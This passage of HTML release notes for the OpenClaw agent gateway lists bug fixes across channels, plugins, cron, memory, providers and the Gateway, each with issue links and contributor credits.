data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JuanRdBO/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JuanRdBO">@JuanRdBO</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solomonneas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solomonneas">@solomonneas</a>.</li>
<li>Media: treat legacy Word/OLE attachments with <code>application/msword</code> or <code>application/x-cfb</code> MIME as binary so printable-looking <code>.doc</code> files are not embedded into prompts as text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131935972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54176" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54176/hovercard" href="https://github.com/openclaw/openclaw/issues/54176">#54176</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4133810089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54380" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54380/hovercard" href="https://github.com/openclaw/openclaw/pull/54380">#54380</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyliu">@andyliu</a>.</li>
<li>Config: accept documented <code>browser.tabCleanup</code> keys in strict root config validation, so configured tab cleanup no longer fails before runtime reads it. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353207232" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74577" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74577/hovercard" href="https://github.com/openclaw/openclaw/issues/74577">#74577</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lonexreb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lonexreb">@lonexreb</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ezdlp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ezdlp">@ezdlp</a>.</li>
<li>Cron: validate disabled job schedule edits before persisting updates, so invalid cron changes no longer partially mutate stored jobs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351895210" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74459" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74459/hovercard" href="https://github.com/openclaw/openclaw/issues/74459">#74459</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</li>
<li>CLI/cron: warn when <code>openclaw cron add --message</code> omits a nonblank <code>--agent</code>, including blank agent values and session-key jobs, so scheduled agent-turn jobs make default-agent fallback explicit while system events stay quiet. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4051936623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42196/hovercard" href="https://github.com/openclaw/openclaw/issues/42196">#42196</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052315763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42245" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42245/hovercard" href="https://github.com/openclaw/openclaw/pull/42245">#42245</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethanclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethanclaw">@ethanclaw</a>.</li>
<li>Channels/status: keep Telegram, Slack, and Google Chat read-only allowlist/default-target accessors on config-only paths, so status and channel summaries do not resolve SecretRef-backed runtime credentials. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eusine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eusine">@eusine</a>.</li>
<li>Active Memory: clarify the deprecated <code>modelFallbackPolicy</code> warning and config help so <code>modelFallback</code> is described as a chain-resolution last resort, not runtime failover. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353454562" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74602" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74602/hovercard" href="https://github.com/openclaw/openclaw/pull/74602">#74602</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrey701/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrey701">@jeffrey701</a>.</li>
<li>Channels/Discord: keep read-only allowlist/default-target accessors from resolving SecretRef-backed bot tokens, so status and channel summaries no longer fail when tokens are only available in gateway runtime. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354779461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74737/hovercard" href="https://github.com/openclaw/openclaw/pull/74737">#74737</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eusine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eusine">@eusine</a>.</li>
<li>Gateway/sessions: align session abort wait semantics across <code>chat</code>, <code>agent</code>, and <code>sessions</code> server methods so abort RPCs return after the targeted sessions actually halt instead of resolving early while runs are still draining. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354883943" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74751" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74751/hovercard" href="https://github.com/openclaw/openclaw/pull/74751">#74751</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Agents/output: drop copied inbound metadata-only assistant replay turns before provider replay instead of synthesizing a placeholder, so Telegram and other channels cannot receive <code>[assistant copied inbound metadata omitted]</code> as model output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354851470" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74745" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74745/hovercard" href="https://github.com/openclaw/openclaw/issues/74745">#74745</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adamwdear/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adamwdear">@adamwdear</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Doctor/memory: suppress skipped embedding-readiness warnings for key-optional providers such as Ollama and LM Studio while preserving timeout and not-ready diagnostics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353533459" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74608" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74608/hovercard" href="https://github.com/openclaw/openclaw/issues/74608">#74608</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347037109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73882/hovercard" href="https://github.com/openclaw/openclaw/issues/73882">#73882</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Channels/groups: preserve observe-only turn suppression for prepared dispatch paths and restore deprecated channel turn runtime aliases, so passive observer/group flows stay silent while older plugins keep compiling. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu: skip empty-text messages (e.g. <code>{"text":""}</code>) that carry no media, so no blank user turn is written to the session and downstream LLM providers cannot reject the request with "messages must not be empty". (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353876867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74634" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74634/hovercard" href="https://github.com/openclaw/openclaw/issues/74634">#74634</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xdengli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xdengli">@xdengli</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Feishu/Bitable: clean up newly created placeholder rows whose fields contain only default empty values while preserving meaningful link, attachment, user, number, boolean, and location values during create-app cleanup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347281559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73920" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73920/hovercard" href="https://github.com/openclaw/openclaw/pull/73920">#73920</a>) Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043329694" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40602" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40602/hovercard" href="https://github.com/openclaw/openclaw/pull/40602">#40602</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/boat2moon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/boat2moon">@boat2moon</a>.</li>
<li>macOS app: keep attach-only mode and the Debug Settings launchd toggle marker-only, so launching with <code>--attach-only</code>/<code>--no-launchd</code> no longer uninstalls the Gateway LaunchAgent or drops active sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330918206" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72174" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72174/hovercard" href="https://github.com/openclaw/openclaw/pull/72174">#72174</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DolencLuka/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DolencLuka">@DolencLuka</a>.</li>
<li>Plugin SDK: restore the deprecated <code>plugin-sdk/zalouser</code> command-auth facade so published Lark/Zalo plugins that import it load on current hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354621148" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74702" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74702/hovercard" href="https://github.com/openclaw/openclaw/issues/74702">#74702</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Goron01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Goron01">@Goron01</a>.</li>
<li>Plugins/runtime-deps: include bundled provider plugins when <code>models.providers</code>, auth profiles, agent defaults, or subagent model refs configure that provider, while keeping inactive default-enabled provider plugins out of doctor repair. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350160379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74307" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74307/hovercard" href="https://github.com/openclaw/openclaw/issues/74307">#74307</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Skeptomenos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Skeptomenos">@Skeptomenos</a>.</li>
<li>Plugins/runtime: resolve relative plugin <code>api.resolvePath</code> inputs against the plugin root instead of the host working directory, while keeping absolute and home paths user-resolved. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354673479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74718" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74718/hovercard" href="https://github.com/openclaw/openclaw/pull/74718">#74718</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jimdawdy-hub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jimdawdy-hub">@jimdawdy-hub</a>.</li>
<li>Plugins/runtime-deps: refresh mirrored root chunks through a temporary file before replacing the active copy, so failed refreshes do not delete chunks that running plugin imports still need. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/runtime-deps: prefer <code>require</code> conditional exports when building staged dependency aliases, so CommonJS-only plugin runtime deps such as <code>ws</code> do not resolve to ESM wrappers under Jiti. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352876135" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74547" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74547/hovercard" href="https://github.com/openclaw/openclaw/issues/74547">#74547</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aderius/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aderius">@aderius</a>.</li>
<li>Bonjour/Gateway: cap flapping advertiser restarts in a sliding window, so mDNS probing/name-conflict loops disable discovery instead of churning indefinitely on constrained hosts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348958904" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74209" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74209/hovercard" href="https://github.com/openclaw/openclaw/issues/74209">#74209</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349224957" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74242" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74242/hovercard" href="https://github.com/openclaw/openclaw/pull/74242">#74242</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ndj888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ndj888">@ndj888</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Plugins/runtime-deps: verify staged package entry files before reusing mirrored runtime roots, so browser-control repairs incomplete <code>ajv</code>/MCP SDK installs after update instead of failing after restart on a missing <code>ajv/dist/ajv.js</code>. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353810195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74630" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74630/hovercard" href="https://github.com/openclaw/openclaw/issues/74630">#74630</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spickeringlr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spickeringlr">@spickeringlr</a>.</li>
<li>Heartbeat: resolve <code>responsePrefix</code> template variables with the selected provider, model, and thinking context before delivering alerts or suppressing prefixed <code>HEARTBEAT_OK</code> replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057207695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43064" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43064/hovercard" href="https://github.com/openclaw/openclaw/issues/43064">#43064</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057211022" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43065" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43065/hovercard" href="https://github.com/openclaw/openclaw/pull/43065">#43065</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077564180" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46858" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46858/hovercard" href="https://github.com/openclaw/openclaw/pull/46858">#46858</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yweiii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yweiii">@yweiii</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JunJD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JunJD">@JunJD</a>.</li>
<li>Memory/LanceDB: show full memory UUIDs in the <code>memory_forget</code> candidate list so agents can pass the displayed ID back to targeted deletion without hitting the full-UUID validator. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265695758" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66913" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66913/hovercard" href="https://github.com/openclaw/openclaw/pull/66913">#66913</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amittell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amittell">@amittell</a>.</li>
<li>File-transfer plugin: require canonical read-path preflight authorization for <code>file.fetch</code>, fail closed when <code>dir.fetch</code> preflight entries are missing, absolute, or traversing, and recheck returned archive entries before handing archive bytes to callers. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348342550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74134" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74134/hovercard" href="https://github.com/openclaw/openclaw/pull/74134">#74134</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
<li>Channels/Feishu: retry file-typed iOS video resource downloads as <code>media</code> after a Feishu/Lark HTTP 502 and preserve the original 502 when the fallback also fails. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095635032" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49855" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49855/hovercard" href="https://github.com/openclaw/openclaw/issues/49855">#49855</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098933775" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50164" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50164/hovercard" href="https://github.com/openclaw/openclaw/pull/50164">#50164</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347465827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73986" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73986/hovercard" href="https://github.com/openclaw/openclaw/pull/73986">#73986</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-xuweilong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-xuweilong">@alex-xuweilong</a>.</li>
<li>Providers/Amazon Bedrock: expose the full Claude Opus 4.7 thinking profile (<code>xhigh</code>, <code>adaptive</code>, and <code>max</code>) for Bedrock model refs, while keeping Opus/Sonnet 4.6 on adaptive-by-default, so <code>/think</code> menus and validation match the Anthropic transport behavior. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354600083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74701" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74701/hovercard" href="https://github.com/openclaw/openclaw/issues/74701">#74701</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/prasad-yashdeep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/prasad-yashdeep">@prasad-yashdeep</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sparkleHazard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sparkleHazard">@sparkleHazard</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Plugins/tokenjuice: compile the bundled plugin against tokenjuice 0.7.0's published OpenClaw host types instead of a local compatibility shim, so package contract drift fails in OpenClaw validation before release. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>OAuth/secrets: ignore root-level Google OAuth <code>client_secret_*.json</code> downloads so local client-secret files do not appear as commit candidates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354413662" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74689" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74689/hovercard" href="https://github.com/openclaw/openclaw/pull/74689">#74689</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeongdulee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeongdulee">@jeongdulee</a>.</li>
<li>Memory: mirror <code>sqlite-vec</code> into packaged bundled-plugin runtime deps for the default memory plugin, so builtin vector search does not lose its SQLite extension after upgrading to 2026.4.27. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354441000" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74692" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74692/hovercard" href="https://github.com/openclaw/openclaw/issues/74692">#74692</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mozi1924/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mozi1924">@mozi1924</a>.</li>
<li>Gateway/startup: bound local discovery advertisement during startup, so a stuck discovery plugin can no longer keep the Gateway from reaching ready. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346875416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73865" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73865/hovercard" href="https://github.com/openclaw/openclaw/issues/73865">#73865</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353810195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74630" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74630/hovercard" href="https://github.com/openclaw/openclaw/issues/74630">#74630</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353860044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74633" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74633/hovercard" href="https://github.com/openclaw/openclaw/issues/74633">#74633</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lpendeavors/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lpendeavors">@lpendeavors</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moltar-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moltar-bot">@moltar-bot</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Saboor711/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Saboor711">@Saboor711</a>.</li>
<li>Gateway/models: serve the last successful model catalog while stale reloads refresh in the background, so Gateway control-plane and OpenAI-compatible requests no longer block behind model-provider rediscovery after model config changes. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348343209" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74135" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74135/hovercard" href="https://github.com/openclaw/openclaw/issues/74135">#74135</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353810195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74630" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74630/hovercard" href="https://github.com/openclaw/openclaw/issues/74630">#74630</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353860044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74633" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74633/hovercard" href="https://github.com/openclaw/openclaw/issues/74633">#74633</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DerFlash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DerFlash">@DerFlash</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moltar-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moltar-bot">@moltar-bot</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Saboor711/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Saboor711">@Saboor711</a>.</li>
<li>CLI/status: resolve read-only channel setup runtime fallback from the packaged OpenClaw dist root, so <code>status --all</code>, <code>status --deep</code>, channel, and doctor paths do not crash when an external channel plugin needs setup metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354478427" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74693" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74693/hovercard" href="https://github.com/openclaw/openclaw/issues/74693">#74693</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giangthb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giangthb">@giangthb</a>.</li>
<li>SDK/events: keep per-run SDK event streams from surfacing duplicate raw chat projection frames, while normalizing chat-only projection frames and preserving raw access through <code>rawEvents</code>. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354625879" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74704" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74704/hovercard" href="https://github.com/openclaw/openclaw/issues/74704">#74704</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>SDK: report Gateway terminal <code>agent.wait</code> timeout snapshots with lifecycle metadata as <code>timed_out</code> while keeping bare wait deadlines non-terminal. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/clawsweeper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/clawsweeper">@clawsweeper</a>.</li>
<li>Google Meet: block managed Chrome intro/test speech until browser health proves the participant is in-call, and expose <code>speechReady</code> diagnostics so login, admission, permission, and audio-bridge blockers no longer look like successful speech. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Slack/commands: keep native command argument menus on select controls for encoded choice values up to Slack's option limit and truncate fallback button labels to Slack's button-text limit, so long valid choices no longer render invalid Slack blocks. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
